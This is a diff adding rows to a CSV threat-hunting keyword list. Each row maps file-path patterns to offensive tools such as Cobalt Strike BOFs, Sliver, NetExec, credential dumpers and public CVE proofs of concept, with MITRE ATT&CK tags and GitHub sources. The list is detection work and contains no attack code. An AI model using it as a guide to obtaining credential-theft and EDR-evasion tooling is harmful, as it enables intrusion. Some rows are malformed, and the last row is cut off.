+"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"*/.msf4/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*/.nxc/obfuscated_scripts/*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/.ssh/RAI.pub*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*//:ptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*//:sptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*//crack.sh/get-cracking/*","offensive_tool_keyword","crack.sh","crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*//Lh0St/InJ3C*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*//localhost:1337*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" 
+"*//RRh0St/InJ3C*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*//shuck.sh*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*//StaticSyscallsDump/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/0d1n.c*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/0d1n_view*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/0tt7/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0004","N/A","N/A","Exploitation tools","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","1","15","9","2022-02-21T08:25:56Z","2022-02-21T00:51:14Z" +"*/0xdarkvortex-*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*/0xIronGoat/dirty-pipe*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" +"*/0xthirteen/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - 
T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/1mxml/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","3","1","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" +"*/365-Stealer.git*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*/3DESEncryptor.go*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/4luc4rdr5290/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" +"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/acheron.git*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/acheron.go*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/ACLight.git*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*/ACLight/*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*/acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*/AD_Enumeration_Hunt*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*/ADACLScanner.git*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*/adalanche/modules/*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect 
credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*/adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" 
+"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 